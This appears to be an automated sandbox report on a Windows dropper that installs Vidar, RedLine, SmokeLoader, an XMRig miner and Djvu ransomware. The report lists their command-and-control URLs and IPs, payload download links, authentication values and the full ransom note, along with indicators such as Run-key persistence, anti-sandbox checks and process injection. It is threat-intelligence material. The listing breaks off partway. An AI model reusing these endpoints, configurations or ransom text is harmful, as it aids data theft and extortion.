Analysis
-
max time kernel
81s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
13-03-2022 09:00
Static task
static1
Behavioral task
behavioral1
Sample
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
Resource
win10v2004-en-20220113
General
-
Target
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
-
Size
3.7MB
-
MD5
4bd56f1559ed71cbe361a5eb98872ec7
-
SHA1
22eb1eac44baaac3bab313d35f7732aafb4e80a3
-
SHA256
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d
-
SHA512
4928dd3e2b789ef14fea37c9fdae070a3516cf496d8b2cff8b90720c6de5315ad7df1a54564fa4986adeb1534300eaaa7ab998774a33c7e4fb8c2483c0c35e4c
Malware Config
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
Build2
45.142.213.135:30059
Extracted
redline
ruzkida
185.11.73.55:22201
-
auth_value
000938fe0d697ca6a3b6cee46ba02ff3
Extracted
redline
ruzki12_03
176.122.23.55:11768
-
auth_value
c51ddc8008e8581a01cec6e8291c5530
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
Detected Djvu ransomware 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2132-357-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2132-363-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2132-364-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 652 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/1548-234-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/5472-281-0x0000000000210000-0x0000000000384000-memory.dmp family_redline behavioral2/memory/5472-278-0x0000000000210000-0x0000000000384000-memory.dmp family_redline behavioral2/memory/5472-287-0x0000000000210000-0x0000000000384000-memory.dmp family_redline behavioral2/memory/5472-290-0x0000000000210000-0x0000000000384000-memory.dmp family_redline behavioral2/memory/5964-305-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2232-344-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Danabot Key Exchange Request
suricata: ET MALWARE Danabot Key Exchange Request
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1504-213-0x0000000000A20000-0x0000000000ABD000-memory.dmp family_vidar behavioral2/memory/1504-214-0x0000000000400000-0x00000000008EC000-memory.dmp family_vidar -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1344-252-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1344-253-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1344-254-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 280 5220 rundll32.exe 311 5680 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 52 IoCs
Processes:
setup_installer.exesetup_install.exesahiba_7.exesahiba_5.exesahiba_8.exesahiba_4.exesahiba_1.exesahiba_2.exesahiba_3.exesahiba_6.exesahiba_1.exeChrome2.exejfiag3g_gg.exeInstall2.EXEBIRZAC~1.EXEP1GlorySetp.exejfiag3g_gg.exeBIRZAC~1.EXEsystem64.exeBIRZAC~1.EXEBUILD2~1.EXEsihost64.exeGGZuKAvlVgsiOJtG4ZvHBMf8.exeq7qe_a0ikJj9r1Tt_dSq8ad5.exeRTLIv59rgr2ywOZxYERl3i7d.exe5yfazEzcdUiOwhyVDRk6VI26.exeOdWkSXo7oi5oqr8oooXgrl2n.exevuT2PIE6PhD4AILOarquXntr.exevl8txTVy4WKIfcG7GdJi3UHD.execcvPZKnxQVnp6SMk85B2ULTz.exeDnSUr5m02PxtLbSxliYLhS_O.exen8_CxLe71_GIr_omHI3emyQO.exepuFib_mN6HqGzK5uF14kFFxZ.exeItMkYX_n_SCidLEm796l_vOZ.exeWerFault.exe9mwVCm19d9gWrQGu9nBZuWD8.exeRD6tmZH473Mxiy1QiSni4Ipw.exeaP3Zf8LTtQ0RxlWoO0vNq15I.exefssUXsmjbrvldMR6Zvp75yT6.exereg.exeIRqBjdGvO3HADSt6rUEhDsXS.exeF1_vMNmHEe9SnGkmIibX0lSm.exeInstall.exe5yfazEzcdUiOwhyVDRk6VI26.exebdd506f1-f2b8-464c-be8a-328fdc7c3369.exeInstall.exeaP3Zf8LTtQ0RxlWoO0vNq15I.exedada.exesystem64.exebuild.exeiaghphix.exeAccostarmi.exe.pifpid process 2504 setup_installer.exe 1680 setup_install.exe 1164 sahiba_7.exe 1272 sahiba_5.exe 4748 sahiba_8.exe 4756 sahiba_4.exe 4784 sahiba_1.exe 4792 sahiba_2.exe 1504 sahiba_3.exe 1912 sahiba_6.exe 308 sahiba_1.exe 256 Chrome2.exe 2104 jfiag3g_gg.exe 848 Install2.EXE 3464 BIRZAC~1.EXE 404 P1GlorySetp.exe 1780 jfiag3g_gg.exe 3336 BIRZAC~1.EXE 3584 system64.exe 1548 BIRZAC~1.EXE 2408 BUILD2~1.EXE 776 sihost64.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5332 q7qe_a0ikJj9r1Tt_dSq8ad5.exe 5320 RTLIv59rgr2ywOZxYERl3i7d.exe 5344 5yfazEzcdUiOwhyVDRk6VI26.exe 5352 OdWkSXo7oi5oqr8oooXgrl2n.exe 5372 vuT2PIE6PhD4AILOarquXntr.exe 5384 vl8txTVy4WKIfcG7GdJi3UHD.exe 5400 ccvPZKnxQVnp6SMk85B2ULTz.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5416 n8_CxLe71_GIr_omHI3emyQO.exe 5424 puFib_mN6HqGzK5uF14kFFxZ.exe 5472 ItMkYX_n_SCidLEm796l_vOZ.exe 5480 WerFault.exe 5572 9mwVCm19d9gWrQGu9nBZuWD8.exe 5596 RD6tmZH473Mxiy1QiSni4Ipw.exe 5604 aP3Zf8LTtQ0RxlWoO0vNq15I.exe 5628 fssUXsmjbrvldMR6Zvp75yT6.exe 5744 reg.exe 5788 IRqBjdGvO3HADSt6rUEhDsXS.exe 5796 F1_vMNmHEe9SnGkmIibX0lSm.exe 1968 Install.exe 5964 5yfazEzcdUiOwhyVDRk6VI26.exe 5368 bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe 4816 Install.exe 2132 aP3Zf8LTtQ0RxlWoO0vNq15I.exe 6412 dada.exe 6456 system64.exe 6540 build.exe 7016 iaghphix.exe 5552 Accostarmi.exe.pif -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
build.exesetup_installer.exe9mwVCm19d9gWrQGu9nBZuWD8.exesihost64.exesystem64.exeInstall.exeRTLIv59rgr2ywOZxYERl3i7d.exef6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exeBUILD2~1.EXEsystem64.exeq7qe_a0ikJj9r1Tt_dSq8ad5.exen8_CxLe71_GIr_omHI3emyQO.exesahiba_1.exeChrome2.exesahiba_6.exeRD6tmZH473Mxiy1QiSni4Ipw.exesahiba_8.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation build.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 9mwVCm19d9gWrQGu9nBZuWD8.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sihost64.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation system64.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation RTLIv59rgr2ywOZxYERl3i7d.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation BUILD2~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation system64.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation q7qe_a0ikJj9r1Tt_dSq8ad5.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation n8_CxLe71_GIr_omHI3emyQO.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sahiba_1.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Chrome2.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sahiba_6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation RD6tmZH473Mxiy1QiSni4Ipw.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sahiba_8.exe -
Loads dropped DLL 39 IoCs
Processes:
setup_install.exesahiba_2.exerundll32.exeGGZuKAvlVgsiOJtG4ZvHBMf8.exeDnSUr5m02PxtLbSxliYLhS_O.exeRD6tmZH473Mxiy1QiSni4Ipw.exedada.exepid process 1680 setup_install.exe 1680 setup_install.exe 1680 setup_install.exe 1680 setup_install.exe 1680 setup_install.exe 4792 sahiba_2.exe 2208 rundll32.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5408 DnSUr5m02PxtLbSxliYLhS_O.exe 5312 GGZuKAvlVgsiOJtG4ZvHBMf8.exe 5596 RD6tmZH473Mxiy1QiSni4Ipw.exe 5596 RD6tmZH473Mxiy1QiSni4Ipw.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe 6412 dada.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
n8_CxLe71_GIr_omHI3emyQO.exesahiba_7.exeInstall2.EXEmsedge.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\n8_CxLe71_GIr_omHI3emyQO.exe" n8_CxLe71_GIr_omHI3emyQO.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" sahiba_7.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Install2.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Install2.EXE Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ipinfo.io 254 ipinfo.io 255 ipinfo.io 256 ipinfo.io 284 ipinfo.io 285 ipinfo.io 13 ip-api.com 15 ipinfo.io -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
ItMkYX_n_SCidLEm796l_vOZ.exepid process 5472 ItMkYX_n_SCidLEm796l_vOZ.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
BIRZAC~1.EXEsystem64.exe5yfazEzcdUiOwhyVDRk6VI26.exeWerFault.exeaP3Zf8LTtQ0RxlWoO0vNq15I.exesystem64.exeiaghphix.exepuFib_mN6HqGzK5uF14kFFxZ.exedescription pid process target process PID 3464 set thread context of 1548 3464 BIRZAC~1.EXE BIRZAC~1.EXE PID 3584 set thread context of 1344 3584 system64.exe explorer.exe PID 5344 set thread context of 5964 5344 5yfazEzcdUiOwhyVDRk6VI26.exe 5yfazEzcdUiOwhyVDRk6VI26.exe PID 5480 set thread context of 2232 5480 WerFault.exe AppLaunch.exe PID 5604 set thread context of 2132 5604 aP3Zf8LTtQ0RxlWoO0vNq15I.exe aP3Zf8LTtQ0RxlWoO0vNq15I.exe PID 6456 set thread context of 464 6456 system64.exe explorer.exe PID 7016 set thread context of 6548 7016 iaghphix.exe svchost.exe PID 5424 set thread context of 5680 5424 puFib_mN6HqGzK5uF14kFFxZ.exe rundll32.exe -
Drops file in Program Files directory 23 IoCs
Processes:
setup.exerundll32.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220313090038.pma setup.exe File opened for modification C:\Program Files\Mozilla Firefox\install.log rundll32.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll rundll32.exe File opened for modification C:\Program Files\7-Zip\descript.ion rundll32.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt rundll32.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e7ec193e-95f7-4a80-835c-4d15524e77df.tmp setup.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe rundll32.exe File opened for modification C:\Program Files\7-Zip\7z.exe rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png rundll32.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt rundll32.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt rundll32.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm rundll32.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\IA2Marshal.dll rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll rundll32.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll rundll32.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt rundll32.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3272 2208 WerFault.exe rundll32.exe 4872 1504 WerFault.exe sahiba_3.exe 3560 1344 WerFault.exe explorer.exe 3940 1344 WerFault.exe explorer.exe 5272 5352 WerFault.exe OdWkSXo7oi5oqr8oooXgrl2n.exe 5812 5628 WerFault.exe fssUXsmjbrvldMR6Zvp75yT6.exe 3420 5788 WerFault.exe IRqBjdGvO3HADSt6rUEhDsXS.exe 3652 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 5480 2132 WerFault.exe aP3Zf8LTtQ0RxlWoO0vNq15I.exe 3060 5352 WerFault.exe OdWkSXo7oi5oqr8oooXgrl2n.exe 1080 5788 WerFault.exe IRqBjdGvO3HADSt6rUEhDsXS.exe 5740 5424 WerFault.exe puFib_mN6HqGzK5uF14kFFxZ.exe 6560 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 6676 5372 WerFault.exe vuT2PIE6PhD4AILOarquXntr.exe 7064 5744 WerFault.exe 9HQpyhe09hiHI_EcwfONmvON.exe 6388 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 5804 464 WerFault.exe explorer.exe 5336 7016 WerFault.exe iaghphix.exe 4844 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 6692 464 WerFault.exe explorer.exe 6604 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 6208 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 6200 5320 WerFault.exe RTLIv59rgr2ywOZxYERl3i7d.exe 4080 5424 WerFault.exe puFib_mN6HqGzK5uF14kFFxZ.exe 7040 5424 WerFault.exe puFib_mN6HqGzK5uF14kFFxZ.exe 5728 5424 WerFault.exe puFib_mN6HqGzK5uF14kFFxZ.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
sahiba_2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sahiba_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sahiba_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sahiba_2.exe -
Checks processor information in registry 2 TTPs 57 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
puFib_mN6HqGzK5uF14kFFxZ.exerundll32.exebdd506f1-f2b8-464c-be8a-328fdc7c3369.exeDnSUr5m02PxtLbSxliYLhS_O.exeGGZuKAvlVgsiOJtG4ZvHBMf8.exeRD6tmZH473Mxiy1QiSni4Ipw.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 puFib_mN6HqGzK5uF14kFFxZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DnSUr5m02PxtLbSxliYLhS_O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GGZuKAvlVgsiOJtG4ZvHBMf8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor puFib_mN6HqGzK5uF14kFFxZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RD6tmZH473Mxiy1QiSni4Ipw.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GGZuKAvlVgsiOJtG4ZvHBMf8.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 puFib_mN6HqGzK5uF14kFFxZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RD6tmZH473Mxiy1QiSni4Ipw.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 